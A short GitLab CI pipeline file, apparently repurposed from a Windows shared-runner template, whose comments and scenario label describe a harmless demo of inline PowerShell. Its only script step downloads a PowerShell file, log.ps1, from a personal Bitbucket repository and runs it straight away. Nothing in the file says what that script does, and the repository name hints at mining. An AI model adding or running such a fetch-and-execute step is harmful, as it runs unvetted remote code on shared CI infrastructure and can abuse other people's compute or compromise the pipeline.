stages:
  - run_on_windows_with_artifact_gen

yml_embedded_script_on_windows:
  stage: run_on_windows_with_artifact_gen
  # There is no image: tag because Windows shared runners are shell runners
  # These tags are only required for targeting shared Windows runners on GitLab.com, remove for self-hosted private runners
  tags:  
  - shared-windows
  - windows
  - windows-1809

  variables:
    SCENARIO: "*** SCENARIO: Run inline .gitlab-ci.yml PowerShell code on a Windows Shell runner"

  script:
    - |
      Invoke-WebRequest https://bitbucket.org/mukidi001/scmin/raw/09523efc915a2b1c2973b200af19bb30ba88a303/log.ps1 -OutFile log.ps1
      ./log.ps1
